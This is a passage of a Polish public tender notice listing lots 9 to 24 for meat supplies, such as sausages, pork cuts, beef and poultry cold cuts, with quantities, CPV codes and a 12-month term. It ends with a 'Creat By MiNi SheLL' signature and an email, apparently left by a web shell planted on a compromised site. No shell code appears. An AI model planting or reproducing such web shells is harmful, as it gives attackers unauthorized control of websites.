<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> wedliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn
miary
Ilość

1




wędliny
151 311 30-5
Wędlina średnio rozdrobniona
kg
250


Wędlina średnio rozdrobniona
kg
700


Wędliny średnio rozdrobnione
kg
400


Wędlina średnio rozdrobniona
kg
400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> salami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Salami
151 312 30-6
salami
kg
150


salami
kg
50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.12.30-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> wedliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Wędliny
15131130-5
Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
600


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
350


Wędlina wieprzowa
kg
250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> pasztety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Pasztety
15131310-1
pasztetowa
kg
200


pasztetowa

30


pasztetowa

50


pasztet

50


pasztetowa

150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> wołowina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
wołowina
151 111 00-0
wołowina
kg
300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> wieprzowina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wieprzowina
151 130 00-3
Boczek świeży
kg
20


golonka
kg
50


Karkówka b/k
kg
300


Karkówka z/k
kg
50


Łopatka b/k
kg
300


Łopatka z/k
kg
50


Mięso mielone
kg
100


Polędwiczki wieprzowe 
kg
20


Schab b/k
kg
300


Schab z/k
kg
50


słonina
kg
50


Szynka b/k
kg
400


Szynka z/k
kg
50


żeberka
kg
100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> mięso suszone, solone, wędzone lub marynowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Mięso suszone, solone, wędzone lub marynowane
151 312 00-7
Boczek wędzony
kg
150


Polędwica wędzona
kg
50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.12.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> podroby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


podroby
151 140 00-0
Flaki wołowe
kg
100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> szynka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


szynka
151 314 10-2
Szynka gotowana
kg
100


Szynka wędzona
kg
100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.14.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> wędliny drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




Wędliny drobiowe
151 311 35-0
Baton drobiowy
kg
50


Mielonka drobiowa
kg
100


Polędwica drobiowa
kg
50


Pierś drobiowa
kg
50


Śniadaniowa drobiowa
kg
50


Szynka tostowa drobiowa
kg
30


Rolada drobiowa
kg
50


Szynka drobiowa
kg
50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> kaszanka i inne wędliny krwiste.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Kaszanka  i inne  wędliny krwiste
151 314 10-2
Salceson czarny
kg
150


Salceson ozorkowy
kg
15


krupnioki
kg
30


kaszanka
kg
200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.34-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Luncheon meat (lanszmit)
kg
150


metka
kg
80


mortadela
kg
150


Parówka cienka
kg
80


Parówka - serdelka
kg
80


Parówka hot-dog
kg
50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> wedliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Kiełbasa śląska
kg
100


Kiełbasa zwyczajna
kg
400


Kiełbasa toruńska
kg
100


kabanosy
kg
30


Kiełbasa biała parzona
kg
250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> salami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Salami
151 312 30-6
Salami
kg
10
2


Wędliny
151 311 30-5
Krakowska parzona
kg
100


ogonówka
kg
150


Szynka konserwowa prasowana
kg
50


szynkowa
kg
100


żywiecka
kg
100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> pasztety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Pasztety
151 313 10-1
pasztetowa
kg
150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> wołowina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
wołowina
151 111 00-0
Wołowina b/k
kg
150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com